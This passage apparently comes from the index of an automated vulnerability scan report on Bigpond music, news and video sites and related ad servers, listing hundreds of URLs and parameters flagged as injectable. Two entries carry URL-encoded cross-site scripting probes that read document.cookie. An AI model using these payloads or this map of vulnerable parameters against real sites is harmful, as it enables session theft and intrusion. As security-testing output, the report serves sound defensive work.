2.329. http://bigpondmusic.com/my/password [REST URL parameter 2]

2.330. http://bigpondmusic.com/my/password [name of an arbitrarily supplied request parameter]

2.331. http://bigpondmusic.com/news/ [REST URL parameter 1]

2.332. http://bigpondmusic.com/news/ [REST URL parameter 1]

2.333. http://bigpondmusic.com/news/ [name of an arbitrarily supplied request parameter]

2.334. http://bigpondmusic.com/news/ [ref parameter]

2.335. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 1]

2.336. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 1]

2.337. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 2]

2.338. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 2]

2.339. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 4]

2.340. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 4]

2.341. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [name of an arbitrarily supplied request parameter]

2.342. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 1]

2.343. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 1]

2.344. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 2]

2.345. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 2]

2.346. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 4]

2.347. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 4]

2.348. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [name of an arbitrarily supplied request parameter]

2.349. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 1]

2.350. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 1]

2.351. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 2]

2.352. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 2]

2.353. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 4]

2.354. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 4]

2.355. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [name of an arbitrarily supplied request parameter]

2.356. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 1]

2.357. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 1]

2.358. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 2]

2.359. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 2]

2.360. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 4]

2.361. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 4]

2.362. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [name of an arbitrarily supplied request parameter]

2.363. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 1]

2.364. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 1]

2.365. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 2]

2.366. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 2]

2.367. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 4]

2.368. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 4]

2.369. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [name of an arbitrarily supplied request parameter]

2.370. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 1]

2.371. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 1]

2.372. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 2]

2.373. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 2]

2.374. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 4]

2.375. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 4]

2.376. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [name of an arbitrarily supplied request parameter]

2.377. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 1]

2.378. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 1]

2.379. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 2]

2.380. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 2]

2.381. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 4]

2.382. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 4]

2.383. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [name of an arbitrarily supplied request parameter]

2.384. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 1]

2.385. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 1]

2.386. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 2]

2.387. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 2]

2.388. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 4]

2.389. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 4]

2.390. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [name of an arbitrarily supplied request parameter]

2.391. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 1]

2.392. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 1]

2.393. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 2]

2.394. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 2]

2.395. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 4]

2.396. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 4]

2.397. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [name of an arbitrarily supplied request parameter]

2.398. http://bigpondmusic.com/search [REST URL parameter 1]

2.399. http://bigpondmusic.com/search [REST URL parameter 1]

2.400. http://bigpondmusic.com/search [name of an arbitrarily supplied request parameter]

2.401. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 1]

2.402. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 1]

2.403. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 2]

2.404. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 2]

2.405. http://bigpondnews.com/articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html [REST URL parameter 2]

2.406. http://bigpondnews.com/articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html [REST URL parameter 2]

2.407. http://bigpondnews.com/articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html [REST URL parameter 2]

2.408. http://bigpondnews.com/articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html [REST URL parameter 2]

2.409. http://bigpondnews.com/articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html [REST URL parameter 2]

2.410. http://bigpondnews.com/articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html [REST URL parameter 2]

2.411. http://bigpondnews.com/articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html [REST URL parameter 2]

2.412. http://bigpondnews.com/articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html [REST URL parameter 2]

2.413. http://bigpondnews.com/articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html [REST URL parameter 2]

2.414. http://bigpondnews.com/articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html [REST URL parameter 2]

2.415. http://bigpondnews.com/articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html [REST URL parameter 2]

2.416. http://bigpondnews.com/articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html [REST URL parameter 2]

2.417. http://bigpondnews.com/articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html [REST URL parameter 2]

2.418. http://bigpondnews.com/articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html [REST URL parameter 2]

2.419. http://bigpondnews.com/articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html [REST URL parameter 2]

2.420. http://bigpondnews.com/articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html [REST URL parameter 2]

2.421. http://bigpondnews.com/articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html [REST URL parameter 2]

2.422. http://bigpondnews.com/articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html [REST URL parameter 2]

2.423. http://bigpondnews.com/articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html [REST URL parameter 2]

2.424. http://bigpondnews.com/articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html [REST URL parameter 2]

2.425. http://bigpondnews.com/articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html [REST URL parameter 2]

2.426. http://bigpondnews.com/articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html [REST URL parameter 2]

2.427. http://bigpondnews.com/articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html [REST URL parameter 2]

2.428. http://bigpondnews.com/articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html [REST URL parameter 2]

2.429. http://bigpondnews.com/articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html [REST URL parameter 2]

2.430. http://bigpondnews.com/articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html [REST URL parameter 2]

2.431. http://bigpondnews.com/articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html [REST URL parameter 2]

2.432. http://bigpondnews.com/articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html [REST URL parameter 2]

2.433. http://bigpondnews.com/articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html [REST URL parameter 2]

2.434. http://bigpondnews.com/articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html [REST URL parameter 2]

2.435. http://bigpondnews.com/articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html [REST URL parameter 2]

2.436. http://bigpondnews.com/articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html [REST URL parameter 2]

2.437. http://bigpondnews.com/articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html [REST URL parameter 2]

2.438. http://bigpondnews.com/articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html [REST URL parameter 2]

2.439. http://bigpondnews.com/articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html [REST URL parameter 2]

2.440. http://bigpondnews.com/articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html [REST URL parameter 2]

2.441. http://bigpondnews.com/articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html [REST URL parameter 2]

2.442. http://bigpondnews.com/articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html [REST URL parameter 2]

2.443. http://bigpondnews.com/articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html [REST URL parameter 2]

2.444. http://bigpondnews.com/articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html [REST URL parameter 2]

2.445. http://bigpondnews.com/articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html [REST URL parameter 2]

2.446. http://bigpondnews.com/articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html [REST URL parameter 2]

2.447. http://bigpondvideo.com/ [bd5b1%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea21cf603a85 parameter]

2.448. http://bigpondvideo.com/ [name of an arbitrarily supplied request parameter]

2.449. http://bigpondvideo.com/ [ref parameter]

2.450. http://bigpondvideo.com/AFL/ [name of an arbitrarily supplied request parameter]

2.451. http://bigpondvideo.com/AFL/ [ref parameter]

2.452. http://bigpondvideo.com/GamesLatest/ [name of an arbitrarily supplied request parameter]

2.453. http://bigpondvideo.com/GamesLatest/ [ref parameter]

2.454. http://bigpondvideo.com/GamesTrailers/ [name of an arbitrarily supplied request parameter]

2.455. http://bigpondvideo.com/GamesTrailers/ [ref parameter]

2.456. http://bigpondvideo.com/Music/ [name of an arbitrarily supplied request parameter]

2.457. http://bigpondvideo.com/Music/ [ref parameter]

2.458. http://bigpondvideo.com/NRL/ [name of an arbitrarily supplied request parameter]

2.459. http://bigpondvideo.com/NRL/ [ref parameter]

2.460. http://bigpondvideo.com/NewsOnDemand/ [c014e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E522ee782289 parameter]

2.461. http://bigpondvideo.com/NewsOnDemand/ [name of an arbitrarily supplied request parameter]

2.462. http://bigpondvideo.com/NewsOnDemand/ [ref parameter]

2.463. http://bigpondvideo.com/NewsOnDemandEntertainment/ [name of an arbitrarily supplied request parameter]

2.464. http://bigpondvideo.com/NewsOnDemandEntertainment/ [ref parameter]

2.465. http://bigpondvideo.com/NewsOnDemandFinance/ [name of an arbitrarily supplied request parameter]

2.466. http://bigpondvideo.com/NewsOnDemandFinance/ [ref parameter]

2.467. http://bigpondvideo.com/NewsOnDemandNational/ [name of an arbitrarily supplied request parameter]

2.468. http://bigpondvideo.com/NewsOnDemandNational/ [ref parameter]

2.469. http://bigpondvideo.com/NewsOnDemandOddspot/ [name of an arbitrarily supplied request parameter]

2.470. http://bigpondvideo.com/NewsOnDemandOddspot/ [ref parameter]

2.471. http://bigpondvideo.com/NewsOnDemandWorld/ [name of an arbitrarily supplied request parameter]

2.472. http://bigpondvideo.com/NewsOnDemandWorld/ [ref parameter]

2.473. http://bigpondvideo.com/Sport/ [name of an arbitrarily supplied request parameter]

2.474. http://bigpondvideo.com/Sport/ [ref parameter]

2.475. http://bigpondvideo.com/Top_Music_Videos/ [name of an arbitrarily supplied request parameter]

2.476. http://bigpondvideo.com/Top_Music_Videos/ [ref parameter]

2.477. http://bigpondvideo.com/Trailers/ [name of an arbitrarily supplied request parameter]

2.478. http://bigpondvideo.com/Trailers/ [ref parameter]

2.479. http://bigpondvideo.com/Travel/ [name of an arbitrarily supplied request parameter]

2.480. http://bigpondvideo.com/Travel/ [ref parameter]

2.481. http://bigpondvideo.com/Web/Flash/carousel [name of an arbitrarily supplied request parameter]

2.482. http://bigpondvideo.com/Web/Flash/carousel [rand parameter]

2.483. http://bigpondvideo.com/Web/Flash/flash_overlay [name of an arbitrarily supplied request parameter]

2.484. http://bigpondvideo.com/Web/Flash/flash_overlay [rand parameter]

2.485. http://bigpondvideo.com/Web/Flash/flash_overlay_all [name of an arbitrarily supplied request parameter]

2.486. http://bigpondvideo.com/Web/Flash/flash_overlay_all [rand parameter]

2.487. http://bigpondvideo.com/Web/Flash/headerFl [name of an arbitrarily supplied request parameter]

2.488. http://bigpondvideo.com/Web/Flash/headerFl [rand parameter]

2.489. http://bigpondvideo.com/Web/Flash/leaveBehind [name of an arbitrarily supplied request parameter]

2.490. http://bigpondvideo.com/Web/Flash/leaveBehind [rand parameter]

2.491. http://bigpondvideo.com/Web/Flash/main_nav [name of an arbitrarily supplied request parameter]

2.492. http://bigpondvideo.com/Web/Flash/main_nav [rand parameter]

2.493. http://bigpondvideo.com/Web/Flash/presentationPlayer [name of an arbitrarily supplied request parameter]

2.494. http://bigpondvideo.com/Web/Flash/presentationPlayer [rand parameter]

2.495. http://bigpondvideo.com/Web/Flash/skyscraperL [name of an arbitrarily supplied request parameter]

2.496. http://bigpondvideo.com/Web/Flash/skyscraperL [rand parameter]

2.497. http://bigpondvideo.com/Web/Flash/skyscraperR [name of an arbitrarily supplied request parameter]

2.498. http://bigpondvideo.com/Web/Flash/skyscraperR [rand parameter]

2.499. http://bigpondvideo.com/Web/Flash/title_bar [name of an arbitrarily supplied request parameter]

2.500. http://bigpondvideo.com/Web/Flash/title_bar [rand parameter]

2.501. http://bigpondvideo.com/footytv/ [name of an arbitrarily supplied request parameter]

2.502. http://bigpondvideo.com/footytv/ [ref parameter]

2.503. http://bigpondvideo.com/games/ [name of an arbitrarily supplied request parameter]

2.504. http://bigpondvideo.com/games/ [ref parameter]

2.505. http://bigpondvideo.com/leaguetv/ [name of an arbitrarily supplied request parameter]

2.506. http://bigpondvideo.com/leaguetv/ [ref parameter]

2.507. http://bigpondvideo.com/musictv/ [name of an arbitrarily supplied request parameter]

2.508. http://bigpondvideo.com/musictv/ [ref parameter]

2.509. http://bigpondvideo.com/newstv/ [name of an arbitrarily supplied request parameter]

2.510. http://bigpondvideo.com/newstv/ [ref parameter]

2.511. http://bigpondvideo.com/racingtv/ [name of an arbitrarily supplied request parameter]

2.512. http://bigpondvideo.com/racingtv/ [ref parameter]

2.513. http://bigpondvideo.com/surfing/ [name of an arbitrarily supplied request parameter]

2.514. http://bigpondvideo.com/surfing/ [ref parameter]

2.515. http://bigpondvideo.com/v8/ [name of an arbitrarily supplied request parameter]

2.516. http://bigpondvideo.com/v8/ [ref parameter]

2.517. http://blog.utest.com/ [name of an arbitrarily supplied request parameter]

2.518. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npui parameter]

2.519. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 2]

2.520. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 2]

2.521. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 2]

2.522. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 3]

2.523. http://dvd.bigpondmovies.com/dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03! [REST URL parameter 2]

2.524. http://dvd.bigpondmovies.com/dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03! [REST URL parameter 2]

2.525. http://dvd.bigpondmovies.com/dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03! [REST URL parameter 3]

2.526. http://iad.bigpondvideo.com/ [name of an arbitrarily supplied request parameter]

2.527. http://iad.bigpondvideo.com/indexInfinityPlayer.php [allowOverlays parameter]

2.528. http://iad.bigpondvideo.com/indexInfinityPlayer.php [allowPreBuffer parameter]

2.529. http://iad.bigpondvideo.com/indexInfinityPlayer.php [autoStart parameter]

2.530. http://iad.bigpondvideo.com/indexInfinityPlayer.php [bFinish parameter]

2.531. http://iad.bigpondvideo.com/indexInfinityPlayer.php [bgColor parameter]

2.532. http://iad.bigpondvideo.com/indexInfinityPlayer.php [bgColor parameter]

2.533. http://iad.bigpondvideo.com/indexInfinityPlayer.php [cStyle parameter]

2.534. http://iad.bigpondvideo.com/indexInfinityPlayer.php [cStyle parameter]

2.535. http://iad.bigpondvideo.com/indexInfinityPlayer.php [cStyle parameter]

2.536. http://iad.bigpondvideo.com/indexInfinityPlayer.php [controls parameter]

2.537. http://iad.bigpondvideo.com/indexInfinityPlayer.php [controls parameter]

2.538. http://iad.bigpondvideo.com/indexInfinityPlayer.php [domain parameter]

2.539. http://iad.bigpondvideo.com/indexInfinityPlayer.php [environment parameter]

2.540. http://iad.bigpondvideo.com/indexInfinityPlayer.php [errorFontColor parameter]

2.541. http://iad.bigpondvideo.com/indexInfinityPlayer.php [errorFontSize parameter]

2.542. http://iad.bigpondvideo.com/indexInfinityPlayer.php [flv parameter]

2.543. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fontColor parameter]

2.544. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fontSize parameter]

2.545. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fullScreen parameter]

2.546. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fullScreen parameter]

2.547. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

2.548. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

2.549. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

2.550. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

2.551. http://iad.bigpondvideo.com/indexInfinityPlayer.php [holdingImgDefault parameter]

2.552. http://iad.bigpondvideo.com/indexInfinityPlayer.php [invoke parameter]

2.553. http://iad.bigpondvideo.com/indexInfinityPlayer.php [isSecure parameter]

2.554. http://iad.bigpondvideo.com/indexInfinityPlayer.php [live parameter]

2.555. http://iad.bigpondvideo.com/indexInfinityPlayer.php [liveBwOption parameter]

2.556. http://iad.bigpondvideo.com/indexInfinityPlayer.php [location parameter]

2.557. http://iad.bigpondvideo.com/indexInfinityPlayer.php [name of an arbitrarily supplied request parameter]

2.558. http://iad.bigpondvideo.com/indexInfinityPlayer.php [os parameter]

2.559. http://iad.bigpondvideo.com/indexInfinityPlayer.php [os parameter]

2.560. http://iad.bigpondvideo.com/indexInfinityPlayer.php [phpSessionId parameter]

2.561. http://iad.bigpondvideo.com/indexInfinityPlayer.php [platformId parameter]

2.562. http://iad.bigpondvideo.com/indexInfinityPlayer.php [propertyId parameter]

2.563. http://iad.bigpondvideo.com/indexInfinityPlayer.php [radio parameter]

2.564. http://iad.bigpondvideo.com/indexInfinityPlayer.php [randId parameter]

2.565. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showBw parameter]

2.566. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showBw parameter]

2.567. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showFeedback parameter]

2.568. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showFeedback parameter]

2.569. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showMenu parameter]

2.570. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showMenu parameter]

2.571. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showTitle parameter]

2.572. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showTooltip parameter]

2.573. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showTooltip parameter]

2.574. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showUnmetered parameter]

2.575. http://iad.bigpondvideo.com/indexInfinityPlayer.php [siteId parameter]

2.576. http://iad.bigpondvideo.com/indexInfinityPlayer.php [stf parameter]

2.577. http://iad.bigpondvideo.com/indexInfinityPlayer.php [stf parameter]

2.578. http://iad.bigpondvideo.com/indexInfinityPlayer.php [titleHeight parameter]

2.579. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

2.580. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

2.581. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

2.582. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

2.583. http://iad.bigpondvideo.com/indexInfinityPlayer.php [windowless parameter]

2.584. http://iad.bigpondvideo.com/indexInfinityPlayer.php [windowless parameter]

2.585. http://iad.bigpondvideo.com/indexInfinityPlayer.php [wmv parameter]

2.586. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [REST URL parameter 1]

2.587. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [REST URL parameter 2]

2.588. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [name of an arbitrarily supplied request parameter]

2.589. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [REST URL parameter 1]

2.590. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [REST URL parameter 2]

2.591. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [name of an arbitrarily supplied request parameter]

2.592. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

2.593. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

2.594. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

2.595. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [REST URL parameter 1]

2.596. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [REST URL parameter 2]

2.597. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [name of an arbitrarily supplied request parameter]

2.598. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [REST URL parameter 1]

2.599. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [REST URL parameter 2]

2.600. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [name of an arbitrarily supplied request parameter]

